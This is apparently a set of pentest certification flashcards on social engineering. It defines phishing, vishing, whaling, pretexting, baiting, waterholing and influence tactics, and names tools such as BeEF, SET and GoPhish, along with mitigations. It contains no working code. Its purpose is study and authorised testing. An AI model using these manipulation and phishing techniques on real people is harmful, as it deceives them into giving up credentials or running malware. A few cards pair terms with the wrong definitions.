Chapter 6 Social Egineering
Using flattery or physical attractiveness to lure a target into doing something.
Likeness
identify your targets from the ________ for phishing.
Rules of Engagement (RoE)
is a technique used to capitalize on a target's trust relationship with websites they commonly visit. This strategy targets a particular group, where an attacker observes websites the group frequents on a regular basis and infects one of the sites with malware.
Waterholing
Used to create a feeling of urgency to influence one's decision-making logic. False statements can be used to persuade someone to do something because it sounds important and there is little time to act, such as "This sale ends today. Act now before it's too late!"
Scarcity
There are a number of mitigations organizations can use to thwart risks associated with social engineering attacks, including
• Security training • Fine-tuning technological controls • Active defense (intrusion detection and prevention systems) and security monitoring (cameras for dumpster diving) • Shredders for sensitive information (i.e., papers and CDs, etc.) • Organizational policy for handling sensitive information Annual testing that can help prepare for orgs for various types of phishing attacks.
The page will have an embedded JavaScript tag that will load the BeEF JavaScript code ________ to hook the browser into the framework.
(hook.js)
It is important to ensure that any type of social engineering attack used within a pentest is covered in the ____1____ and approved in the __2__ prior to execution.
1. statement of work (SOW) 2. rules of engagement (RoE)
the first objective of the invading force. In the context of computer security testing or adversarial cyber-attacks, the beachhead would be the point of presence behind the security perimeter (e.g., external firewall) that could be used to launch attacks in an effort to advance further into the target network.
A beachhead
focuses on sending out high volumes of emails that appear to be legitimate in nature: "50% off at Best Buy, click the link to order now!"
A phishing campaign
Can be performed in a legal (impersonating an officer of the law), organizational (impersonating a business leadership official), or social (dominant figure in a group of one's peers) leadership role to gain access to property or controlled information.
Authority,
he Social Engineering Framework (https://www.social-engineer.org) provides definitions and examples for each type of influential tactic:
Authority, Scarcity, Social Proof, Likeness, Fear
a procedure used to lure a target into doing something using a tangible reward. An example would be dropping a USB device or CD labeled "company financial data." The idea is to spark the curiosity of the target and persuade him or her to insert the device and open a harmless file, which could really be malware or ransomware.
Baiting
which is also installed in Kali Linux, stands for the Browser Exploitation Framework and focuses on client-side attacks against web browsers.
BeEF (Browser Exploitation Framework)
another social engineering method used to retrieve sensitive information from an organization's dumpster/trash in order to attack the computer network. The objective is to find sensitive information that may or may not have been shredded such as usernames, passwords, software, account information, financial statements, meeting notes, etc.
Dumpster diving
This approach attempts to strike fear into the target. An example would be using malware (scareware) to influence someone's decision to purchase or download fake antivirus programs or other software with malicious intent.
Fear
is a phishing framework used to test an organization's exposure to phishing. You can create phishing templates, target lists, and track results in an online dashboard. Pentesters can use this type of framework to test and evaluate phishing methods in a controlled environment.
GoPhish
is the process of asking questions to get answers about specific topics.
Interrogation
Pentesters can be hired to engage in phishing attack vectors to evaluate technical defense measures over the network, like spam filters for email, web content filters, firewalls, and other types of access control devices. help validate employee behavior patterns to report and respond to the threat, as well as a controlled compromise method to gain an initial foothold into an organization's network. Phishing is accomplished using telephone- and email-based attacks.
Phishing
This is a fraud technique delivered through email, phone, or text message used to obtain sensitive information from the target. One of the most popular methods used for social engineering
Phishing
is a technique used to fabricate scenarios. During disastrous situations, either manmade (large data breaches) or due to Mother Nature (hurricanes, earthquakes, etc.), attackers will try and take advantage of a situation. If a large company gets hacked and personal and financial information is compromised, attackers may prey on the victims of the attack and fabricate a story to help provide credit monitoring services for a nominal fee.
Pretexting, or pretext for short,
attacks can deliver malware or a URL of a malicious website. Attackers may use different motivational techniques like scarcity or fear to entice the victim to click on the link. SMS messages can be fabricated and delivered using a special SMS phishing application, and an automated recording can deliver standardized messages to a target audience. SMS messages can also be used to entice a user to call a 1-900 number or to reply with personal information.
SMS Phishing
Two common types of phishing attacks, facilitated over telecommunication networks, are known as ______ and ______. Attackers (or scammers) are typically motivated by financial gain. Each method supports automation, which can help deliver scams and unsolicited messages to a wide range of targets with little effort.
SMS phishing and voice phishing (or vishing)
Attackers have created programs to run in the background to look like the blue screen of death for Microsoft Windows and have even gone as far as using ransomware, where the malicious program encrypts the contents of the victim's hard drive and will force the user to pay a ransom to decrypt the contents of the hard drive.
Scareware
an observation technique where an attacker pretends to do something else while instead observing what a target is doing, such as typing in a password.
Shoulder surfing
This is a social phenomenon describing the kind of conformity that causes an outsider to follow a group's behavior. It can also be known as the lack of ability to determine an appropriate mode or behavior in an unfamiliar situation and end up following the actions of someone else who may sound like he knows what he is saying. For example, the "everyone is doing it" effect.
Social Proof
This approach is selective, such that only a choice number of targets are identified for the attack. targets are solicited through an email-spoofing attack from what looks to be a legitimate source. The email could have a link or document (e.g., macro-embedded Word file that carries and executes malware) inside, which encourages the user to click on it.
Spear phishing
is a Python-based framework installed by default in Kali Linux that can be used to aid pentesters with carrying out phishing exercises. Phishing attacks use email to deliver the social engineering message and email content and URLs to lure the target into clicking on a link.
The Social-Engineer Toolkit (SET)
is also a spoofed-email attack that is used to target members of an organization with credentials and access to resources that could cause catastrophic damage to a business if compromised. Emails could be fabricated with legal issues, executive issues, or even unsatisfactory comments from a customer.
Whaling
The purpose of social engineering is to extract meaningful information from a target. This process is known as
elicitation
using a verbal pretext to elicit sensitive information from a target. The goals may be to entice someone to provide an unpublished phone number, the name of an authority or vendor, details about operational procedures, or even to click on a link or open an e-mail through phone-based reinforcement.
voice phishing, aka "vishing"